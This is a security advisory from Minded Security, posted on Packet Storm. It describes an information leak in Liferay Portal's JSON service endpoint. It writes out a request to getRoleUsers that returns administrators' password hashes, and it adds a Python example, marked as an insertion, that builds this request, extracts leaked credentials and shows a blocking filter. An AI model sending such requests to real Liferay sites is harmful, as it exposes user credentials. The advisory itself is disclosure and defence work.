Liferay JSON Service Information Leakage

2010-08-13T00:00:00
ID PACKETSTORM:92733
Type packetstorm
Reporter Stefano Di Paola
Modified 2010-08-13T00:00:00

Description

Minded Security Labs: Advisory #MSA251009  
Liferay JSON Service Multiple Information Leakage  
  
Tested Versions:   
Liferay Portal 4.x and 5.x  
  
  
Minded Security ReferenceID:  
MSA251009  
  
  
Credits:  
Discovery by   
Stefano Di Paola of Minded Security   
stefano.dipaola [_at_] mindedsecurity.com  
  
  
Reference:  
http://issues.liferay.com/browse/LPS-9555  
  
  
Severity:   
High: an authenticated user can invoke restricted functionality and  
obtain sensitive user information, including password hashes.  
  
  
Solution:   
Expose only the standard web functionality and prevent direct access to  
the JSON service endpoint (/c/portal/json_service).  
  
  
Summary  
  
Several service classes and static methods can be invoked directly through  
the JSON service endpoint, and some of them return sensitive information.  
  
  
Analysis  
  
  
Several methods can be invoked directly by sending a request to the following URL  
  
https://<yoursite>/c/portal/json_service  
  
via POST with a body of the following form:  
  
callback=<JavascriptFunctionName>  
&serviceClassName=com.liferay.portal.service.http.<ClassName>JSON  
&serviceMethodName=<StaticMethodName>  
&parameter1=<Value>&parameter2=<Value>  
&serviceParameters=parameter1,parameter2...etc  
  
where callback is the name of the JavaScript function that will wrap the  
result and serviceParameters is the comma-separated list of the request  
parameters to bind to the method's arguments.  
  
  
  
An authenticated user who sends such a request receives an answer from the  
server of the following form:  
  
HTTP/1.1 200 OK  
  
<JavascriptFunctionName>({response JSON object});  
  
  
  
The accessible methods were analysed: many classes and static methods are  
reachable, and a large part of them do enforce access control.  
  
However, several methods that return information about users either perform  
no administrative access control or are explicitly allowed to any logged-in  
user. These methods can be used to obtain sensitive information.  
  
For example, an attacker can call the method "getRoleUsers" of  
UserServiceJSON to retrieve the complete user objects of every member of a  
role, including the internal Liferay password hashes (SHA-1, Base64 encoded),  
with the following request (in the tested installation the administrative  
role id is 10107):  
  
POST /c/portal/json_service HTTP/1.1  
  
callback=ss&serviceClassName=com.liferay.portal.service.http.UserServiceJSON  
&serviceMethodName=getRoleUsers&roleId=10107&screenName=getRoleUsers  
&serviceParameters=roleId  
  
HTTP/1.1 200 OK  
  
ss([{"portraitId":0,"agreedToTermsOfUse":true,"passwordEncrypted":true,  
"screenName":"liferayadmin","password":"yg\/MD******************hs=",  
"passwordReset":false,"defaultUser":false,  
"lastFailedLoginDate":"1253900971","userId":10133....   
  
  
As can be seen, the server answer contains the full user object of the  
administrator, including the password hash (unsalted SHA-1, Base64 encoded).  
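The following Python script is an added example and is not part of the advisory or of Liferay's own code. It models the request format described in the Analysis section (callback, serviceClassName, serviceMethodName, serviceParameters), parses the JSONP-style answer without evaluating it as JavaScript, extracts the leaked password field from the returned user objects, and shows the request-level check a front-end filter could apply to implement the Solution above (deny direct calls to /c/portal/json_service). All network I/O is omitted; the sample response is constructed to mirror the fields shown in the advisory, with a dummy hash value, and the function names and the assumption that a filter can inspect the POST body are the example's own.

```python
"""Added example: model of the Liferay json_service request/response
described in advisory MSA251009. Not vendor code; no network access."""
import json
import re
from urllib.parse import parse_qs, urlencode

JSON_SERVICE_PATH = "/c/portal/json_service"
SERVICE_PACKAGE = "com.liferay.portal.service.http."


def build_request_body(callback, class_name, method_name, params):
    """Build the POST body the advisory describes.

    params maps parameter name -> value (insertion ordered); its keys become
    both the individual name=value pairs and the comma-separated
    serviceParameters list that tells the service which ones to bind.
    """
    fields = {
        "callback": callback,
        "serviceClassName": SERVICE_PACKAGE + class_name + "JSON",
        "serviceMethodName": method_name,
    }
    fields.update(params)
    fields["serviceParameters"] = ",".join(params.keys())
    return urlencode(fields)


_CALLBACK_RE = re.compile(r"^[A-Za-z_$][\w$]*$")


def parse_jsonp(callback, body):
    """Strip the callback(...) wrapper and return the decoded JSON payload.

    The callback name is echoed from the request, so it is checked against a
    strict identifier pattern and the exact expected prefix/suffix instead of
    being evaluated as JavaScript.
    """
    if not _CALLBACK_RE.match(callback):
        raise ValueError("callback is not a plain identifier")
    body = body.strip()
    prefix, suffix = callback + "(", ");"
    if not (body.startswith(prefix) and body.endswith(suffix)):
        raise ValueError("response is not wrapped in the expected callback")
    return json.loads(body[len(prefix):-len(suffix)])


def leaked_credentials(users):
    """Return {screenName: password} for every user object that carries a
    password field, i.e. what an attacker harvests from getRoleUsers."""
    return {u["screenName"]: u["password"] for u in users if "password" in u}


def is_direct_json_service_call(path, body):
    """Check a front-end filter could apply to enforce the advisory's
    Solution. Returns None for requests that do not target the JSON service,
    otherwise the 'class.method' string to log while the request is denied.
    Assumption (example's own): the filter can read the POST body.
    """
    if path.split("?", 1)[0] != JSON_SERVICE_PATH:
        return None
    q = parse_qs(body)
    cls = q.get("serviceClassName", ["?"])[0]
    meth = q.get("serviceMethodName", ["?"])[0]
    return f"{cls}.{meth}"


# Constructed sample, shaped like the advisory's response (dummy hash).
SAMPLE_RESPONSE = (
    'ss([{"portraitId":0,"agreedToTermsOfUse":true,"passwordEncrypted":true,'
    '"screenName":"liferayadmin","password":"AAAAAAAAAAAAAAAAAAAAAAAAAAA=",'
    '"passwordReset":false,"defaultUser":false,'
    '"lastFailedLoginDate":"1253900971","userId":10133}]);'
)

if __name__ == "__main__":
    body = build_request_body("ss", "UserService", "getRoleUsers",
                              {"roleId": "10107"})
    print("POST body:", body)
    users = parse_jsonp("ss", SAMPLE_RESPONSE)
    print("leaked:", leaked_credentials(users))
    print("deny:", is_direct_json_service_call(JSON_SERVICE_PATH, body))
```

The filter function denies every direct json_service call rather than only UserServiceJSON.getRoleUsers, because the advisory reports that several methods lack adequate checks and only one is shown; blocking a single method name would leave the rest reachable.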
  
  
Disclosure Timeline  
  
25 Oct 2009 Issue found  
12 May 2010 Reported to vendor  
  
  
Disclaimer  
  
  
The information within this paper may change without notice. Use  
of this information constitutes acceptance for use in an AS IS  
condition. There are NO warranties with regard to this information.  
  
In no event shall the author be liable for any damages whatsoever   
arising out of or in connection with the use or spread of this   
information.  
  
Any use of this information is at the user's own risk.  
Permission is hereby granted for the redistribution of this Alert  
electronically. It is not to be edited in any way without express  
consent of Minded Security Research Lab. If you wish to reprint the  
whole or any part of this Alert in any other medium excluding  
electronic medium, please e-mail research_at_mindedsecurity.com   
for permission.  
  
  
  
Copyright (c) 2010 Minded Security S.r.l.  
  
All rights reserved worldwide.  
  
  
  